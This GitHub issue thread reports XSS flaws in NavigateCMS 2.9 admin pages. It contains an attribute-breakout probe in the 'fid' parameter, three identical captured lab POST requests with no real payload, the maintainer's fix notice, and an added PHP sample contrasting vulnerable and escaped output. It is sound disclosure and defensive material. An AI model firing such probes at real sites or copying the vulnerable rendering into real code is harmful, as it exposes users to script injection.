NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.
http://www.navigatecms.com
GNU General Public License v2.0

Cross Site Scripting Vulnerability in function "fid" feature in NavigateCMS 2.9 #21

Closed Songohan22 closed 4 years ago

Songohan22 commented 4 years ago

Describe the bug

An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the function "fid" feature in NavigateCMS 2.9.

To Reproduce

Steps to reproduce the behavior:

  1. Log into the panel.
  2. Go to "/navigate/navigate.php?fid=menus"
  3. Insert payload URL: /navigate/navigate.php?fid=>"'>
  4. /navigate/navigate.php??fid=blocks&act=edit"/>&id=3
  5. I think you should fix it soon.

NavigateCMS commented 4 years ago

Both already fixed in version 2.9.1, check out the new version released today. Thank you Songohan22.

Songohan22 commented 4 years ago

@NavigateCMS Nice...:D

Songohan22 commented 4 years ago

Hi @NavigateCMS

Cross Site Scripting Vulnerability in the function "tracking_script, mail_mailer[], language-variant-code[], language-locale[2], language-locale[1], language-id[2], language-id[1], file-name, comment_default_moderator, additional_styles, additional_scripts" feature in NavigateCMS 2.9

I think you should fix it soon.

NavigateCMS commented 4 years ago

Can you provide an example for the fields additional_styles, additional_scripts and tracking_script? Thank you.

Songohan22 commented 4 years ago

tracking_script Request:

```http
POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit
Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en
Connection: Keep-Alive
Host: 192.168.137.6:8765
X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f
Content-Length: 4481
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=AppScanBoundary

--AppScanBoundary
Content-Disposition: form-data; name="form-sent"

true
--AppScanBoundary
Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d
--AppScanBoundary
Content-Disposition: form-data; name="id"

--AppScanBoundary
Content-Disposition: form-data; name="title"

1234
--AppScanBoundary
Content-Disposition: form-data; name="protocol"

https://
--AppScanBoundary
Content-Disposition: form-data; name="subdomain"

1234
--AppScanBoundary
Content-Disposition: form-data; name="domain"

1234
--AppScanBoundary
Content-Disposition: form-data; name="folder"

1234
--AppScanBoundary
Content-Disposition: form-data; name="homepage_from_structure"

--AppScanBoundary
Content-Disposition: form-data; name="homepage"

25
--AppScanBoundary
Content-Disposition: form-data; name="wrong_path_action"

http_404
--AppScanBoundary
Content-Disposition: form-data; name="wrong_path_redirect"

--AppScanBoundary
Content-Disposition: form-data; name="empty_path_action"

theme_404
--AppScanBoundary
Content-Disposition: form-data; name="permission"

1
--AppScanBoundary
Content-Disposition: form-data; name="redirect_to"

1234
--AppScanBoundary
Content-Disposition: form-data; name="languages-order"

--AppScanBoundary
Content-Disposition: form-data; name="language-id[1]"

en
--AppScanBoundary
Content-Disposition: form-data; name="language-code[]"

25
--AppScanBoundary
Content-Disposition: form-data; name="language-variant[]"

1
--AppScanBoundary
Content-Disposition: form-data; name="language-variant-code[]"

25
--AppScanBoundary
Content-Disposition: form-data; name="language-locale[1]"

ENU_USA
--AppScanBoundary
Content-Disposition: form-data; name="language-published[]"

1
--AppScanBoundary
Content-Disposition: form-data; name="date_format"

Y-m-d
--AppScanBoundary
Content-Disposition: form-data; name="default_timezone"

UTC
--AppScanBoundary
Content-Disposition: form-data; name="website-decimal_separator"

.
--AppScanBoundary
Content-Disposition: form-data; name="website-thousands_separator"

,
--AppScanBoundary
Content-Disposition: form-data; name="website-default_currency"

usd
--AppScanBoundary
Content-Disposition: form-data; name="website-default_size_unit"

mm
--AppScanBoundary
Content-Disposition: form-data; name="website-default_weight_unit"

kg
--AppScanBoundary
Content-Disposition: form-data; name="word_separator"

_
--AppScanBoundary
Content-Disposition: form-data; name="resize_uploaded_images"

1600
--AppScanBoundary
Content-Disposition: form-data; name="website-favicon"

--AppScanBoundary
Content-Disposition: form-data; name="share_files_media_browser"

1
--AppScanBoundary
Content-Disposition: form-data; name="comments_enabled_for"

1
--AppScanBoundary
Content-Disposition: form-data; name="comments_default_moderator"

c_author
--AppScanBoundary
Content-Disposition: form-data; name="page_cache"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_mailer[]"

smtp
--AppScanBoundary
Content-Disposition: form-data; name="mail_server"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_port"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_security"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_ignore_ssl_security"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_user"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_address"

753 Main Street
--AppScanBoundary
Content-Disposition: form-data; name="mail_password"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts
--AppScanBoundary
Content-Disposition: form-data; name="tracking_scripts"

1234
--AppScanBoundary
Content-Disposition: form-data; name="additional_scripts"

1234
--AppScanBoundary
Content-Disposition: form-data; name="additional_styles"

1234
--AppScanBoundary--
```

Songohan22 commented 4 years ago

additional_script Request:

```http
POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit
Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en
Connection: Keep-Alive
Host: 192.168.137.6:8765
X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f
Content-Length: 4481
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=AppScanBoundary

--AppScanBoundary
Content-Disposition: form-data; name="form-sent"

true
--AppScanBoundary
Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d
--AppScanBoundary
Content-Disposition: form-data; name="id"

--AppScanBoundary
Content-Disposition: form-data; name="title"

1234
--AppScanBoundary
Content-Disposition: form-data; name="protocol"

https://
--AppScanBoundary
Content-Disposition: form-data; name="subdomain"

1234
--AppScanBoundary
Content-Disposition: form-data; name="domain"

1234
--AppScanBoundary
Content-Disposition: form-data; name="folder"

1234
--AppScanBoundary
Content-Disposition: form-data; name="homepage_from_structure"

--AppScanBoundary
Content-Disposition: form-data; name="homepage"

25
--AppScanBoundary
Content-Disposition: form-data; name="wrong_path_action"

http_404
--AppScanBoundary
Content-Disposition: form-data; name="wrong_path_redirect"

--AppScanBoundary
Content-Disposition: form-data; name="empty_path_action"

theme_404
--AppScanBoundary
Content-Disposition: form-data; name="permission"

1
--AppScanBoundary
Content-Disposition: form-data; name="redirect_to"

1234
--AppScanBoundary
Content-Disposition: form-data; name="languages-order"

--AppScanBoundary
Content-Disposition: form-data; name="language-id[1]"

en
--AppScanBoundary
Content-Disposition: form-data; name="language-code[]"

25
--AppScanBoundary
Content-Disposition: form-data; name="language-variant[]"

1
--AppScanBoundary
Content-Disposition: form-data; name="language-variant-code[]"

25
--AppScanBoundary
Content-Disposition: form-data; name="language-locale[1]"

ENU_USA
--AppScanBoundary
Content-Disposition: form-data; name="language-published[]"

1
--AppScanBoundary
Content-Disposition: form-data; name="date_format"

Y-m-d
--AppScanBoundary
Content-Disposition: form-data; name="default_timezone"

UTC
--AppScanBoundary
Content-Disposition: form-data; name="website-decimal_separator"

.
--AppScanBoundary
Content-Disposition: form-data; name="website-thousands_separator"

,
--AppScanBoundary
Content-Disposition: form-data; name="website-default_currency"

usd
--AppScanBoundary
Content-Disposition: form-data; name="website-default_size_unit"

mm
--AppScanBoundary
Content-Disposition: form-data; name="website-default_weight_unit"

kg
--AppScanBoundary
Content-Disposition: form-data; name="word_separator"

_
--AppScanBoundary
Content-Disposition: form-data; name="resize_uploaded_images"

1600
--AppScanBoundary
Content-Disposition: form-data; name="website-favicon"

--AppScanBoundary
Content-Disposition: form-data; name="share_files_media_browser"

1
--AppScanBoundary
Content-Disposition: form-data; name="comments_enabled_for"

1
--AppScanBoundary
Content-Disposition: form-data; name="comments_default_moderator"

c_author
--AppScanBoundary
Content-Disposition: form-data; name="page_cache"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_mailer[]"

smtp
--AppScanBoundary
Content-Disposition: form-data; name="mail_server"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_port"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_security"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_ignore_ssl_security"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_user"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_address"

753 Main Street
--AppScanBoundary
Content-Disposition: form-data; name="mail_password"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts
--AppScanBoundary
Content-Disposition: form-data; name="tracking_scripts"

1234
--AppScanBoundary
Content-Disposition: form-data; name="additional_scripts"

1234
--AppScanBoundary
Content-Disposition: form-data; name="additional_styles"

1234
--AppScanBoundary--
```

Songohan22 commented 4 years ago

additional_styles Request:

```http
POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit
Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en
Connection: Keep-Alive
Host: 192.168.137.6:8765
X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f
Content-Length: 4481
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=AppScanBoundary

--AppScanBoundary
Content-Disposition: form-data; name="form-sent"

true
--AppScanBoundary
Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d
--AppScanBoundary
Content-Disposition: form-data; name="id"

--AppScanBoundary
Content-Disposition: form-data; name="title"

1234
--AppScanBoundary
Content-Disposition: form-data; name="protocol"

https://
--AppScanBoundary
Content-Disposition: form-data; name="subdomain"

1234
--AppScanBoundary
Content-Disposition: form-data; name="domain"

1234
--AppScanBoundary
Content-Disposition: form-data; name="folder"

1234
--AppScanBoundary
Content-Disposition: form-data; name="homepage_from_structure"

--AppScanBoundary
Content-Disposition: form-data; name="homepage"

25
--AppScanBoundary
Content-Disposition: form-data; name="wrong_path_action"

http_404
--AppScanBoundary
Content-Disposition: form-data; name="wrong_path_redirect"

--AppScanBoundary
Content-Disposition: form-data; name="empty_path_action"

theme_404
--AppScanBoundary
Content-Disposition: form-data; name="permission"

1
--AppScanBoundary
Content-Disposition: form-data; name="redirect_to"

1234
--AppScanBoundary
Content-Disposition: form-data; name="languages-order"

--AppScanBoundary
Content-Disposition: form-data; name="language-id[1]"

en
--AppScanBoundary
Content-Disposition: form-data; name="language-code[]"

25
--AppScanBoundary
Content-Disposition: form-data; name="language-variant[]"

1
--AppScanBoundary
Content-Disposition: form-data; name="language-variant-code[]"

25
--AppScanBoundary
Content-Disposition: form-data; name="language-locale[1]"

ENU_USA
--AppScanBoundary
Content-Disposition: form-data; name="language-published[]"

1
--AppScanBoundary
Content-Disposition: form-data; name="date_format"

Y-m-d
--AppScanBoundary
Content-Disposition: form-data; name="default_timezone"

UTC
--AppScanBoundary
Content-Disposition: form-data; name="website-decimal_separator"

.
--AppScanBoundary
Content-Disposition: form-data; name="website-thousands_separator"

,
--AppScanBoundary
Content-Disposition: form-data; name="website-default_currency"

usd
--AppScanBoundary
Content-Disposition: form-data; name="website-default_size_unit"

mm
--AppScanBoundary
Content-Disposition: form-data; name="website-default_weight_unit"

kg
--AppScanBoundary
Content-Disposition: form-data; name="word_separator"

_
--AppScanBoundary
Content-Disposition: form-data; name="resize_uploaded_images"

1600
--AppScanBoundary
Content-Disposition: form-data; name="website-favicon"

--AppScanBoundary
Content-Disposition: form-data; name="share_files_media_browser"

1
--AppScanBoundary
Content-Disposition: form-data; name="comments_enabled_for"

1
--AppScanBoundary
Content-Disposition: form-data; name="comments_default_moderator"

c_author
--AppScanBoundary
Content-Disposition: form-data; name="page_cache"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_mailer[]"

smtp
--AppScanBoundary
Content-Disposition: form-data; name="mail_server"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_port"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_security"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_ignore_ssl_security"

1
--AppScanBoundary
Content-Disposition: form-data; name="mail_user"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="mail_address"

753 Main Street
--AppScanBoundary
Content-Disposition: form-data; name="mail_password"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com
--AppScanBoundary
Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts
--AppScanBoundary
Content-Disposition: form-data; name="tracking_scripts"

1234
--AppScanBoundary
Content-Disposition: form-data; name="additional_scripts"

1234
--AppScanBoundary
Content-Disposition: form-data; name="additional_styles"

1234
--AppScanBoundary--
```

NavigateCMS commented 4 years ago

Fixed by 33ef8dffad685576db3b31ae6afc83b619c918f8 and 652c55f6dd6aa23f71d7ef34ac59dbd6e4ebf765
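Added illustration for the two reflection points reported in this thread (the `fid` module selector echoed into the admin page, and website settings such as `tracking_scripts` and `additional_styles` echoed back into the edit form): a vulnerable rendering beside a hardened one. This is example code, not Navigate CMS code and not the content of the fixing commits; the function names, the module list and the fallback module are assumptions.

```php
<?php
// Added example, not Navigate CMS code. Models the two reflection points in
// this thread: the "fid" module selector echoed into the admin page, and
// website settings (tracking_scripts, additional_styles, ...) echoed back
// into the edit form. Function names, module list and fallback are assumed.

// Module names that appear in this thread; the application has its own list.
const KNOWN_MODULES = ['menus', 'blocks', 'websites'];

// Vulnerable pattern: the raw query value lands inside an attribute and in
// element text. A value such as >"'> closes the attribute and the tag.
function render_nav_vulnerable(string $fid): string
{
    return '<a href="navigate.php?fid=' . $fid . '">' . $fid . '</a>';
}

// Hardened: "fid" is an identifier, so allowlist it first; then encode for
// the URL, attribute and text contexts (ENT_QUOTES also escapes ' and ").
function render_nav_hardened(string $fid): string
{
    if (!in_array($fid, KNOWN_MODULES, true)) {
        $fid = 'menus'; // assumption: fall back to a known module
    }
    $text = htmlspecialchars($fid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="navigate.php?fid=' . rawurlencode($fid) . '">' . $text . '</a>';
}

// Stored settings are free text. Inside <textarea> the only way out is the
// sequence </textarea>, so escaping < and > (and quotes, for the name
// attribute) keeps a saved value from becoming markup when re-rendered.
function render_setting_textarea(string $name, string $value): string
{
    $n = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $v = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<textarea name="' . $n . '">' . $v . '</textarea>';
}

// Self-check with the probe shape from the report (constructed input).
function self_check(): bool
{
    $probe = '>"\'>';
    $leaky = strpos(render_nav_vulnerable($probe), 'fid=>"') !== false;
    $clean = render_nav_hardened($probe) === '<a href="navigate.php?fid=menus">menus</a>';
    $ta = render_setting_textarea('additional_styles', '</textarea>' . $probe);
    $noBreak = strpos($ta, '</textarea>') === strlen($ta) - strlen('</textarea>');
    return $leaky && $clean && $noBreak;
}

var_dump(self_check());
```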